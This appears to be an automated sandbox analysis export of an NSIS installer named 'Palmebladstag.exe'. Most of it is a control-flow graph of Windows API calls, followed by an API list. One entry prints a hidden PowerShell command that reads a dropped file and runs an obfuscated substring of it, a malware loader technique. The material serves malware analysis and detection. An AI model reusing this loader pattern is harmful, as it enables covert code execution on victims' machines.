calls 3417->3418 3419 403978 SetWindowTextA 3418->3419 3420 403994 3419->3420 3421 4036a7 3419->3421 3420->3421 3422 405b99 18 API calls 3420->3422 3421->3338 3422->3420 3423->3334 3424->3340 3425->3417 3851 4014f0 SetForegroundWindow 3852 40289c 3851->3852 3853 401af0 3854 402a07 18 API calls 3853->3854 3855 401af7 3854->3855 3856 4029ea 18 API calls 3855->3856 3857 401b00 wsprintfA 3856->3857 3858 40289c 3857->3858 3859 4019f1 3860 402a07 18 API calls 3859->3860 3861 4019fa ExpandEnvironmentStringsA 3860->3861 3862 401a0e 3861->3862 3864 401a21 3861->3864 3863 401a13 lstrcmpA 3862->3863 3862->3864 3863->3864 3865 402877 SendMessageA 3866 402891 InvalidateRect 3865->3866 3867 40289c 3865->3867 3866->3867 3868 401c78 3869 4029ea 18 API calls 3868->3869 3870 401c7e IsWindow 3869->3870 3871 4019e1 3870->3871 3872 404df8 3873 404e08 3872->3873 3874 404e1c 3872->3874 3876 404e65 3873->3876 3877 404e0e 3873->3877 3875 404e24 IsWindowVisible 3874->3875 3879 404e3b 3874->3879 3875->3876 3878 404e31 3875->3878 3880 404e6a CallWindowProcA 3876->3880 3881 403ed3 SendMessageA 3877->3881 3885 40474f SendMessageA 3878->3885 3879->3880 3890 4047cf 3879->3890 3883 404e18 3880->3883 3881->3883 3886 404772 GetMessagePos ScreenToClient SendMessageA 3885->3886 3887 4047ae SendMessageA 3885->3887 3888 4047a6 3886->3888 3889 4047ab 3886->3889 3887->3888 3888->3879 3889->3887 3899 405b77 lstrcpynA 3890->3899 3892 4047e2 3900 405ad5 wsprintfA 3892->3900 3894 4047ec 3895 40140b 2 API calls 3894->3895 3896 4047f5 3895->3896 3901 405b77 lstrcpynA 3896->3901 3898 4047fc 3898->3876 3899->3892 3900->3894 3901->3898 3596 40227d 3597 402a07 18 API calls 3596->3597 3598 40228e 3597->3598 3599 402a07 18 API calls 3598->3599 3600 402297 3599->3600 3601 402a07 18 API calls 3600->3601 3602 4022a1 GetPrivateProfileStringA 3601->3602 3902 40427e 3903 4042b4 3902->3903 3904 40428e 3902->3904 3906 403eee 8 API calls 3903->3906 3905 403e87 19 API calls 3904->3905 3907 40429b SetDlgItemTextA 3905->3907 3908 4042c0 3906->3908 3907->3903 3909 4014fe 3910 401506 3909->3910 3912 401519 3909->3912 3911 4029ea 18 API calls 3910->3911 3911->3912 3913 401000 3914 401037 BeginPaint GetClientRect 3913->3914 3915 40100c DefWindowProcA 3913->3915 3916 4010f3 3914->3916 3918 401179 3915->3918 3919 401073 CreateBrushIndirect FillRect DeleteObject 3916->3919 3920 4010fc 3916->3920 3919->3916 3921 401102 CreateFontIndirectA 3920->3921 3922 401167 EndPaint 3920->3922 3921->3922 3923 401112 6 API calls 3921->3923 3922->3918 3923->3922 3924 404801 GetDlgItem GetDlgItem 3925 404853 7 API calls 3924->3925 3931 404a6b 3924->3931 3926 4048f6 DeleteObject 3925->3926 3927 4048e9 SendMessageA 3925->3927 3928 4048ff 3926->3928 3927->3926 3929 404936 3928->3929 3930 405b99 18 API calls 3928->3930 3932 403e87 19 API calls 3929->3932 3935 404918 SendMessageA SendMessageA 3930->3935 3934 404b4f 3931->3934 3941 40474f 5 API calls 3931->3941 3957 404adc 3931->3957 3937 40494a 3932->3937 3933 404bfb 3936 404c05 SendMessageA 3933->3936 3940 404c0d 3933->3940 3934->3933 3943 404ba8 SendMessageA 3934->3943 3967 404a5e 3934->3967 3935->3928 3936->3940 3942 403e87 19 API calls 3937->3942 3938 403eee 8 API calls 3944 404df1 3938->3944 3939 404b41 SendMessageA 3939->3934 3945 404c26 3940->3945 3946 404c1f ImageList_Destroy 3940->3946 3953 404c36 3940->3953 3941->3957 3958 404958 3942->3958 3948 404bbd SendMessageA 3943->3948 3943->3967 3949 404c2f GlobalFree 3945->3949 3945->3953 3946->3945 3947 404da5 3954 404db7 ShowWindow GetDlgItem ShowWindow 3947->3954 3947->3967 3951 404bd0 3948->3951 3949->3953 3950 404a2c GetWindowLongA SetWindowLongA 3952 404a45 3950->3952 3959 404be1 SendMessageA 3951->3959 3955 404a63 3952->3955 3956 404a4b ShowWindow 3952->3956 3953->3947 3966 4047cf 4 API calls 3953->3966 3970 404c71 3953->3970 3954->3967 3976 403ebc SendMessageA 3955->3976 3975 403ebc SendMessageA 3956->3975 3957->3934 3957->3939 3958->3950 3960 404a26 3958->3960 3963 4049a7 SendMessageA 3958->3963 3964 4049e3 SendMessageA 3958->3964 3965 4049f4 SendMessageA 3958->3965 3959->3933 3960->3950 3960->3952 3963->3958 3964->3958 3965->3958 3966->3970 3967->3938 3968 404d7b InvalidateRect 3968->3947 3969 404d91 3968->3969 3972 40466d 21 API calls 3969->3972 3971 404c9f SendMessageA 3970->3971 3974 404cb5 3970->3974 3971->3974 3972->3947 3973 404d29 SendMessageA SendMessageA 3973->3974 3974->3968 3974->3973 3975->3967 3976->3931 3977 401705 3978 402a07 18 API calls 3977->3978 3979 40170c SearchPathA 3978->3979 3980 401727 3979->3980 3981 404607 3982 404633 3981->3982 3983 404617 3981->3983 3985 404666 3982->3985 3986 404639 SHGetPathFromIDListA 3982->3986 3992 40538c GetDlgItemTextA 3983->3992 3988 404649 3986->3988 3991 404650 SendMessageA 3986->3991 3987 404624 SendMessageA 3987->3982 3989 40140b 2 API calls 3988->3989 3989->3991 3991->3985 3992->3987 3061 402188 3062 402a07 18 API calls 3061->3062 3063 40218e 3062->3063 3064 402a07 18 API calls 3063->3064 3065 402197 3064->3065 3066 402a07 18 API calls 3065->3066 3067 4021a0 3066->3067 3068 405e7b 2 API calls 3067->3068 3069 4021a9 3068->3069 3070 4021ba lstrlenA lstrlenA 3069->3070 3071 4021ad 3069->3071 3073 404e84 25 API calls 3070->3073 3072 404e84 25 API calls 3071->3072 3074 4021b5 3071->3074 3072->3074 3075 4021f6 SHFileOperationA 3073->3075 3075->3071 3075->3074 3993 40220a 3994 402211 3993->3994 3997 402224 3993->3997 3995 405b99 18 API calls 3994->3995 3996 40221e 3995->3996 3998 4053a8 MessageBoxIndirectA 3996->3998 3998->3997 3999 40260c 4000 402613 3999->4000 4001 40289c 3999->4001 4002 402619 FindClose 4000->4002 4002->4001 4003 40268d 4004 402a07 18 API calls 4003->4004 4006 40269b 4004->4006 4005 4026b1 4008 405800 2 API calls 4005->4008 4006->4005 4007 402a07 18 API calls 4006->4007 4007->4005 4009 4026b7 4008->4009 4029 405825 GetFileAttributesA CreateFileA 4009->4029 4011 4026c4 4012 4026d0 GlobalAlloc 4011->4012 4013 40276d 4011->4013 4014 402764 CloseHandle 4012->4014 4015 4026e9 4012->4015 4016 402775 DeleteFileA 4013->4016 4017 402788 4013->4017 4014->4013 4030 4030a4 SetFilePointer 4015->4030 4016->4017 4019 4026ef 4020 403072 ReadFile 4019->4020 4021 4026f8 GlobalAlloc 4020->4021 4022 402708 4021->4022 4023 40273c WriteFile GlobalFree 4021->4023 4025 402e6c 33 API calls 4022->4025 4024 402e6c 33 API calls 4023->4024 4026 402761 4024->4026 4028 402715 4025->4028 4026->4014 4027 402733 GlobalFree 4027->4023 4028->4027 4029->4011 4030->4019 4031 40278e 4032 4029ea 18 API calls 4031->4032 4033 402794 4032->4033 4034 4027b8 4033->4034 4035 4027cf 4033->4035 4039 40266d 4033->4039 4038 4027cc 4034->4038 4042 4027bd 4034->4042 4036 4027e5 4035->4036 4037 4027d9 4035->4037 4041 405b99 18 API calls 4036->4041 4040 4029ea 18 API calls 4037->4040 4038->4039 4046 405ad5 wsprintfA 4038->4046 4040->4038 4041->4038 4045 405b77 lstrcpynA 4042->4045 4045->4039 4046->4039 4047 401490 4048 404e84 25 API calls 4047->4048 4049 401497 4048->4049 4050 401b11 4051 401b62 4050->4051 4052 401b1e 4050->4052 4053 401b8b GlobalAlloc 4051->4053 4054 401b66 4051->4054 4058 401b35 4052->4058 4060 401ba6 4052->4060 4055 405b99 18 API calls 4053->4055 4063 402224 4054->4063 4071 405b77 lstrcpynA 4054->4071 4055->4060 4056 405b99 18 API calls 4057 40221e 4056->4057 4064 4053a8 MessageBoxIndirectA 4057->4064 4069 405b77 lstrcpynA 4058->4069 4060->4056 4060->4063 4062 401b78 GlobalFree 4062->4063 4064->4063 4065 401b44 4070 405b77 lstrcpynA 4065->4070 4067 401b53 4072 405b77 lstrcpynA 4067->4072 4069->4065 4070->4067 4071->4062 4072->4063 4073 402814 4074 4029ea 18 API calls 4073->4074 4075 40281a 4074->4075 4076 40284b 4075->4076 4077 40266d 4075->4077 4079 402828 4075->4079 4076->4077 4078 405b99 18 API calls 4076->4078 4078->4077 4079->4077 4081 405ad5 wsprintfA 4079->4081 4081->4077 3106 401595 3107 402a07 18 API calls 3106->3107 3108 40159c SetFileAttributesA 3107->3108 3109 4015ae 3108->3109 4082 401c95 4083 4029ea 18 API calls 4082->4083 4084 401c9c 4083->4084 4085 4029ea 18 API calls 4084->4085 4086 401ca4 GetDlgItem 4085->4086 4087 4024c9 4086->4087 4088 402517 4089 4029ea 18 API calls 4088->4089 4095 402521 4089->4095 4090 402597 4091 402555 ReadFile 4091->4090 4091->4095 4092 402599 4097 405ad5 wsprintfA 4092->4097 4094 4025a9 4094->4090 4096 4025bf SetFilePointer 4094->4096 4095->4090 4095->4091 4095->4092 4095->4094 4096->4090 4097->4090 3128 40231a 3129 402320 3128->3129 3130 402a07 18 API calls 3129->3130 3131 402332 3130->3131 3132 402a07 18 API calls 3131->3132 3133 40233c RegCreateKeyExA 3132->3133 3134 402366 3133->3134 3135 40289c 3133->3135 3136 40237e 3134->3136 3137 402a07 18 API calls 3134->3137 3138 40238a 3136->3138 3167 4029ea 3136->3167 3140 402377 lstrlenA 3137->3140 3139 4023a5 RegSetValueExA 3138->3139 3145 402e6c 3138->3145 3143 4023bb RegCloseKey 3139->3143 3140->3136 3143->3135 3147 402e84 3145->3147 3146 402eb1 3170 403072 ReadFile 3146->3170 3147->3146 3172 4030a4 SetFilePointer 3147->3172 3151 403001 3153 40304d 3151->3153 3158 403005 3151->3158 3152 402ece GetTickCount 3154 402fec 3152->3154 3164 402ef7 3152->3164 3155 403072 ReadFile 3153->3155 3154->3139 3155->3154 3156 403072 ReadFile 3156->3164 3157 403072 ReadFile 3157->3158 3158->3154 3158->3157 3159 403025 WriteFile 3158->3159 3159->3154 3160 40303a 3159->3160 3160->3154 3160->3158 3161 40304b 3160->3161 3161->3154 3162 402f4d GetTickCount 3162->3164 3163 402f76 MulDiv wsprintfA 3165 404e84 25 API calls 3163->3165 3164->3154 3164->3156 3164->3162 3164->3163 3166 402fb4 WriteFile 3164->3166 3165->3164 3166->3154 3166->3164 3168 405b99 18 API calls 3167->3168 3169 4029fe 3168->3169 3169->3138 3171 402ebc 3170->3171 3171->3151 3171->3152 3171->3154 3172->3146 4098 403f9b lstrcpynA lstrlenA 4099 4016a1 4100 402a07 18 API calls 4099->4100 4101 4016a7 GetFullPathNameA 4100->4101 4102 4016be 4101->4102 4103 4016df 4101->4103 4102->4103 4106 405e7b 2 API calls 4102->4106 4104 4016f3 GetShortPathNameA 4103->4104 4105 40289c 4103->4105 4104->4105 4107 4016cf 4106->4107 4107->4103 4109 405b77 lstrcpynA 4107->4109 4109->4103 4110 401d26 GetDC GetDeviceCaps 4111 4029ea 18 API calls 4110->4111 4112 401d44 MulDiv ReleaseDC 4111->4112 4113 4029ea 18 API calls 4112->4113 4114 401d63 4113->4114 4115 405b99 18 API calls 4114->4115 4116 401d9c CreateFontIndirectA 4115->4116 4117 4024c9 4116->4117 4118 402626 4119 402629 4118->4119 4120 402641 4118->4120 4121 402636 FindNextFileA 4119->4121 4121->4120 4122 402680 4121->4122 4124 405b77 lstrcpynA 4122->4124 4124->4120 3196 40172c 3197 402a07 18 API calls 3196->3197 3198 401733 3197->3198 3202 405854 3198->3202 3200 40173a 3201 405854 2 API calls 3200->3201 3201->3200 3203 40585f GetTickCount GetTempFileNameA 3202->3203 3204 405890 3203->3204 3205 40588c 3203->3205 3204->3200 3205->3203 3205->3204 3206 401dac 3207 4029ea 18 API calls 3206->3207 3208 401db2 3207->3208 3209 4029ea 18 API calls 3208->3209 3210 401dbb 3209->3210 3211 401dc2 ShowWindow 3210->3211 3212 401dcd EnableWindow 3210->3212 3213 40289c 3211->3213 3212->3213 4125 401eac 4126 402a07 18 API calls 4125->4126 4127 401eb3 4126->4127 4128 405e7b 2 API calls 4127->4128 4129 401eb9 4128->4129 4131 401ecb 4129->4131 4132 405ad5 wsprintfA 4129->4132 4132->4131 4133 40192d 4134 402a07 18 API calls 4133->4134 4135 401934 lstrlenA 4134->4135 4136 4024c9 4135->4136 4137 4024ad 4138 402a07 18 API calls 4137->4138 4139 4024b4 4138->4139 4142 405825 GetFileAttributesA CreateFileA 4139->4142 4141 4024c0 4142->4141 4143 401cb0 4144 4029ea 18 API calls 4143->4144 4145 401cc0 SetWindowLongA 4144->4145 4146 40289c 4145->4146 4147 401a31 4148 4029ea 18 API calls 4147->4148 4149 401a37 4148->4149 4150 4029ea 18 API calls 4149->4150 4151 4019e1 4150->4151 3426 401e32 3427 402a07 18 API calls 3426->3427 3428 401e38 3427->3428 3429 404e84 25 API calls 3428->3429 3430 401e42 3429->3430 3431 405347 2 API calls 3430->3431 3435 401e48 3431->3435 3432 401e9e CloseHandle 3434 40266d 3432->3434 3433 401e67 WaitForSingleObject 3433->3435 3436 401e75 GetExitCodeProcess 3433->3436 3435->3432 3435->3433 3435->3434 3437 405edb 2 API calls 3435->3437 3438 401e92 3436->3438 3439 401e87 3436->3439 3437->3433 3438->3432 3441 401e90 3438->3441 3442 405ad5 wsprintfA 3439->3442 3441->3432 3442->3441 3443 4015b3 3444 402a07 18 API calls 3443->3444 3445 4015ba 3444->3445 3446 4056bd 4 API calls 3445->3446 3458 4015c2 3446->3458 3447 40160a 3448 401638 3447->3448 3449 40160f 3447->3449 3455 401423 25 API calls 3448->3455 3451 401423 25 API calls 3449->3451 3450 40564f CharNextA 3452 4015d0 CreateDirectoryA 3450->3452 3453 401616 3451->3453 3454 4015e5 GetLastError 3452->3454 3452->3458 3461 405b77 lstrcpynA 3453->3461 3457 4015f2 GetFileAttributesA 3454->3457 3454->3458 3460 401630 3455->3460 3457->3458 3458->3447 3458->3450 3459 401621 SetCurrentDirectoryA 3459->3460 3461->3459 3462 4039b4 3463 403b07 3462->3463 3464 4039cc 3462->3464 3466 403b58 3463->3466 3467 403b18 GetDlgItem GetDlgItem 3463->3467 3464->3463 3465 4039d8 3464->3465 3469 4039e3 SetWindowPos 3465->3469 3470 4039f6 3465->3470 3468 403bb2 3466->3468 3476 401389 2 API calls 3466->3476 3471 403e87 19 API calls 3467->3471 3472 403ed3 SendMessageA 3468->3472 3477 403b02 3468->3477 3469->3470 3473 403a13 3470->3473 3474 4039fb ShowWindow 3470->3474 3475 403b42 SetClassLongA 3471->3475 3500 403bc4 3472->3500 3478 403a35 3473->3478 3479 403a1b DestroyWindow 3473->3479 3474->3473 3480 40140b 2 API calls 3475->3480 3483 403b8a 3476->3483 3481 403a3a SetWindowLongA 3478->3481 3482 403a4b 3478->3482 3531 403e10 3479->3531 3480->3466 3481->3477 3484 403af4 3482->3484 3485 403a57 GetDlgItem 3482->3485 3483->3468 3486 403b8e SendMessageA 3483->3486 3491 403eee 8 API calls 3484->3491 3489 403a87 3485->3489 3490 403a6a SendMessageA IsWindowEnabled 3485->3490 3486->3477 3487 40140b 2 API calls 3487->3500 3488 403e12 DestroyWindow KiUserCallbackDispatcher 3488->3531 3494 403a94 3489->3494 3497 403adb SendMessageA 3489->3497 3498 403aa7 3489->3498 3506 403a8c 3489->3506 3490->3477 3490->3489 3491->3477 3492 403e41 ShowWindow 3492->3477 3493 405b99 18 API calls 3493->3500 3494->3497 3494->3506 3495 403e60 SendMessageA 3499 403ac2 3495->3499 3496 403e87 19 API calls 3496->3500 3497->3484 3501 403ac4 3498->3501 3502 403aaf 3498->3502 3499->3484 3500->3477 3500->3487 3500->3488 3500->3493 3500->3496 3507 403e87 19 API calls 3500->3507 3522 403d52 DestroyWindow 3500->3522 3503 40140b 2 API calls 3501->3503 3504 40140b 2 API calls 3502->3504 3505 403acb 3503->3505 3504->3506 3505->3484 3505->3506 3506->3495 3508 403c3f GetDlgItem 3507->3508 3509 403c54 3508->3509 3510 403c5c ShowWindow KiUserCallbackDispatcher 3508->3510 3509->3510 3532 403ea9 KiUserCallbackDispatcher 3510->3532 3512 403c86 EnableWindow 3515 403c9a 3512->3515 3513 403c9f GetSystemMenu EnableMenuItem SendMessageA 3514 403ccf SendMessageA 3513->3514 3513->3515 3514->3515 3515->3513 3533 403ebc SendMessageA 3515->3533 3534 405b77 lstrcpynA 3515->3534 3518 403cfd lstrlenA 3519 405b99 18 API calls 3518->3519 3520 403d0e SetWindowTextA 3519->3520 3521 401389 2 API calls 3520->3521 3521->3500 3523 403d6c CreateDialogParamA 3522->3523 3522->3531 3524 403d9f 3523->3524 3523->3531 3525 403e87 19 API calls 3524->3525 3526 403daa GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3525->3526 3527 401389 2 API calls 3526->3527 3528 403df0 3527->3528 3528->3477 3529 403df8 ShowWindow 3528->3529 3530 403ed3 SendMessageA 3529->3530 3530->3531 3531->3477 3531->3492 3532->3512 3533->3515 3534->3518 3535 402036 3536 402a07 18 API calls 3535->3536 3537 40203d 3536->3537 3538 402a07 18 API calls 3537->3538 3539 402047 3538->3539 3540 402a07 18 API calls 3539->3540 3541 402050 3540->3541 3542 402a07 18 API calls 3541->3542 3543 40205a 3542->3543 3544 402a07 18 API calls 3543->3544 3545 402064 3544->3545 3546 402078 CoCreateInstance 3545->3546 3547 402a07 18 API calls 3545->3547 3550 402097 3546->3550 3552 40214d 3546->3552 3547->3546 3548 401423 25 API calls 3549 40217f 3548->3549 3551 40212c MultiByteToWideChar 3550->3551 3550->3552 3551->3552 3552->3548 3552->3549 4152 4014b7 4153 4014bd 4152->4153 4154 401389 2 API calls 4153->4154 4155 4014c5 4154->4155 3553 402438 3554 402b11 19 API calls 3553->3554 3555 402442 3554->3555 3556 4029ea 18 API calls 3555->3556 3557 40244b 3556->3557 3558 402455 3557->3558 3561 40266d 3557->3561 3559 402462 RegEnumKeyA 3558->3559 3560 40246e RegEnumValueA 3558->3560 3562 402487 RegCloseKey 3559->3562 3560->3561 3560->3562 3562->3561 3564 401bb8 3565 4029ea 18 API calls 3564->3565 3566 401bbf 3565->3566 3567 4029ea 18 API calls 3566->3567 3568 401bc9 3567->3568 3569 401bd9 3568->3569 3570 402a07 18 API calls 3568->3570 3571 401be9 3569->3571 3574 402a07 18 API calls 3569->3574 3570->3569 3572 401bf4 3571->3572 3573 401c38 3571->3573 3575 4029ea 18 API calls 3572->3575 3576 402a07 18 API calls 3573->3576 3574->3571 3577 401bf9 3575->3577 3578 401c3d 3576->3578 3579 4029ea 18 API calls 3577->3579 3580 402a07 18 API calls 3578->3580 3581 401c02 3579->3581 3582 401c46 FindWindowExA 3580->3582 3583 401c28 SendMessageA 3581->3583 3584 401c0a SendMessageTimeoutA 3581->3584 3585 401c64 3582->3585 3583->3585 3584->3585 3586 402239 3587 402241 3586->3587 3588 402247 3586->3588 3589 402a07 18 API calls 3587->3589 3590 402257 3588->3590 3591 402a07 18 API calls 3588->3591 3589->3588 3592 402a07 18 API calls 3590->3592 3594 402265 3590->3594 3591->3590 3592->3594 3593 402a07 18 API calls 3595 40226e WritePrivateProfileStringA 3593->3595 3594->3593 3603 4022be 3604 4022c3 3603->3604 3605 4022ee 3603->3605 3607 402b11 19 API calls 3604->3607 3606 402a07 18 API calls 3605->3606 3608 4022f5 3606->3608 3609 4022ca 3607->3609 3615 402a47 RegOpenKeyExA 3608->3615 3610 4022d4 3609->3610 3614 40230b 3609->3614 3611 402a07 18 API calls 3610->3611 3612 4022db RegDeleteValueA RegCloseKey 3611->3612 3612->3614 3616 402adb 3615->3616 3619 402a72 3615->3619 3616->3614 3617 402a98 RegEnumKeyA 3618 402aaa RegCloseKey 3617->3618 3617->3619 3621 405ea2 3 API calls 3618->3621 3619->3617 3619->3618 3620 402acf RegCloseKey 3619->3620 3622 402a47 3 API calls 3619->3622 3624 402abe 3620->3624 3623 402aba 3621->3623 3622->3619 3623->3624 3625 402aea RegDeleteKeyA 3623->3625 3624->3616 3625->3624 3626 40173f 3627 402a07 18 API calls 3626->3627 3628 401746 3627->3628 3629 401764 3628->3629 3630 40176c 3628->3630 3665 405b77 lstrcpynA 3629->3665 3666 405b77 lstrcpynA 3630->3666 3633 401777 3635 405624 3 API calls 3633->3635 3634 40176a 3637 405de2 5 API calls 3634->3637 3636 40177d lstrcatA 3635->3636 3636->3634 3657 401789 3637->3657 3638 405e7b 2 API calls 3638->3657 3639 405800 2 API calls 3639->3657 3641 4017a0 CompareFileTime 3641->3657 3642 401864 3644 404e84 25 API calls 3642->3644 3643 40183b 3645 404e84 25 API calls 3643->3645 3653 401850 3643->3653 3647 40186e 3644->3647 3645->3653 3646 405b77 lstrcpynA 3646->3657 3648 402e6c 33 API calls 3647->3648 3649 401881 3648->3649 3650 401895 SetFileTime 3649->3650 3651 4018a7 FindCloseChangeNotification 3649->3651 3650->3651 3651->3653 3654 4018b8 3651->3654 3652 405b99 18 API calls 3652->3657 3655 4018d0 3654->3655 3656 4018bd 3654->3656 3659 405b99 18 API calls 3655->3659 3658 405b99 18 API calls 3656->3658 3657->3638 3657->3639 3657->3641 3657->3642 3657->3643 3657->3646 3657->3652 3660 4053a8 MessageBoxIndirectA 3657->3660 3664 405825 GetFileAttributesA CreateFileA 3657->3664 3661 4018c5 lstrcatA 3658->3661 3662 4018d8 3659->3662 3660->3657 3661->3662 3663 4053a8 MessageBoxIndirectA 3662->3663 3663->3653 3664->3657 3665->3634 3666->3633 4156 40163f 4157 402a07 18 API calls 4156->4157 4158 401645 4157->4158 4159 405e7b 2 API calls 4158->4159 4160 40164b 4159->4160 4161 40193f 4162 4029ea 18 API calls 4161->4162 4163 401946 4162->4163 4164 4029ea 18 API calls 4163->4164 4165 401950 4164->4165 4166 402a07 18 API calls 4165->4166 4167 401959 4166->4167 4168 40196c lstrlenA 4167->4168 4169 4019a7 4167->4169 4170 401976 4168->4170 4170->4169 4174 405b77 lstrcpynA 4170->4174 4172 401990 4172->4169 4173 40199d lstrlenA 4172->4173 4173->4169 4174->4172

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 4030ef-403186 #17 SetErrorMode OleInitialize call 405ea2 SHGetFileInfoA call 405b77 GetCommandLineA call 405b77 GetModuleHandleA 7 403192-4031a7 call 40564f CharNextA 0->7 8 403188-40318d 0->8 11 403267-40326b 7->11 8->7 12 403271 11->12 13 4031ac-4031af 11->13 16 403284-40329e GetTempPathA call 4030bb 12->16 14 4031b1-4031b5 13->14 15 4031b7-4031bf 13->15 14->14 14->15 18 4031c1-4031c2 15->18 19 4031c7-4031ca 15->19 25 4032a0-4032be GetWindowsDirectoryA lstrcatA call 4030bb 16->25 26 4032f6-403310 DeleteFileA call 402c33 16->26 18->19 20 4031d0-4031d4 19->20 21 403257-403264 call 40564f 19->21 23 4031d6-4031dc 20->23 24 4031e7-403214 20->24 21->11 40 403266 21->40 28 4031e2 23->28 29 4031de-4031e0 23->29 30 403216-40321c 24->30 31 403227-403255 24->31 25->26 42 4032c0-4032f0 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4030bb 25->42 43 4033a4-4033b3 ExitProcess OleUninitialize 26->43 44 403316-40331c 26->44 28->24 29->24 29->28 35 403222 30->35 36 40321e-403220 30->36 31->21 38 403273-40327f call 405b77 31->38 35->31 36->31 36->35 38->16 40->11 42->26 42->43 45 4033b9-4033c9 call 4053a8 ExitProcess 43->45 46 4034ad-4034b3 43->46 48 403394-40339b call 403622 44->48 49 40331e-403329 call 40564f 44->49 52 403530-403538 46->52 53 4034b5-4034d2 call 405ea2 * 3 46->53 61 4033a0 48->61 62 40332b-403354 49->62 63 40335f-403369 49->63 56 40353a 52->56 57 40353e-403542 ExitProcess 52->57 81 4034d4-4034d6 53->81 82 40351c-403527 ExitWindowsEx 53->82 56->57 61->43 65 403356-403358 62->65 66 40336b-403378 call 405712 63->66 67 4033cf-4033e9 lstrcatA lstrcmpiA 63->67 65->63 70 40335a-40335d 65->70 66->43 79 40337a-403390 call 405b77 * 2 66->79 67->43 71 4033eb-403400 CreateDirectoryA SetCurrentDirectoryA 67->71 70->63 70->65 74 403402-403408 call 405b77 71->74 75 40340d-403435 call 405b77 71->75 74->75 87 40343b-403457 call 405b99 DeleteFileA 75->87 79->48 81->82 85 4034d8-4034da 81->85 82->52 88 403529-40352b call 40140b 82->88 85->82 89 4034dc-4034ee GetCurrentProcess 85->89 96 403498-40349f 87->96 97 403459-403469 CopyFileA 87->97 88->52 89->82 98 4034f0-403512 89->98 96->87 99 4034a1-4034a8 call 405a2b 96->99 97->96 100 40346b-40348b call 405a2b call 405b99 call 405347 97->100 98->82 99->43 100->96 110 40348d-403494 CloseHandle 100->110 110->96
                                            APIs
                                            • #17.COMCTL32 ref: 00403110
                                            • SetErrorMode.KERNELBASE(00008001), ref: 0040311B
                                            • OleInitialize.OLE32(00000000), ref: 00403122
                                              • Part of subcall function 00405EA2: GetModuleHandleA.KERNEL32(?,?,?,00403134,00000008), ref: 00405EB4
                                              • Part of subcall function 00405EA2: LoadLibraryA.KERNELBASE(?,?,?,00403134,00000008), ref: 00405EBF
                                              • Part of subcall function 00405EA2: GetProcAddress.KERNEL32(00000000,?), ref: 00405ED0
                                            • SHGetFileInfoA.SHELL32(0079DCB8,00000000,?,00000160,00000000,00000008), ref: 0040314A
                                              • Part of subcall function 00405B77: lstrcpynA.KERNEL32(?,?,00000400,0040315F,007A1F00,NSIS Error), ref: 00405B84
                                            • GetCommandLineA.KERNEL32(007A1F00,NSIS Error), ref: 0040315F
                                            • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\Palmebladstag.exe",00000000), ref: 00403172
                                            • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Palmebladstag.exe",00000020), ref: 0040319D
                                            • GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403295
                                            • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004032A6
                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032B2
                                            • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032C6
                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004032CE
                                            • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004032DF
                                            • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004032E7
                                            • DeleteFileA.KERNELBASE(1033), ref: 004032FB
                                            • ExitProcess.KERNEL32(?), ref: 004033A4
                                            • OleUninitialize.OLE32(?), ref: 004033A9
                                            • ExitProcess.KERNEL32 ref: 004033C9
                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Palmebladstag.exe",00000000,?), ref: 004033D5
                                            • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop), ref: 004033E1
                                            • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 004033ED
                                            • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 004033F4
                                            • DeleteFileA.KERNEL32(0079D8B8,0079D8B8,?,-windowstyle hidden ; $Tangsnarrerne=Get-Content 'C:\Users\user\AppData\Local\Temp\humles\kvarterslag\Menneskeliggrelsens.Lyn';$Ebeneous122=$Tangsnarrerne.SubString(52669,3);.$Ebeneous122($Tangsnarrerne),?), ref: 0040344D
                                            • CopyFileA.KERNEL32(C:\Users\user\Desktop\Palmebladstag.exe,0079D8B8,00000001), ref: 00403461
                                            • CloseHandle.KERNEL32(00000000,0079D8B8,0079D8B8,?,0079D8B8,00000000), ref: 0040348E
                                            • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 004034E3
                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 0040351F
                                            • ExitProcess.KERNEL32 ref: 00403542
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
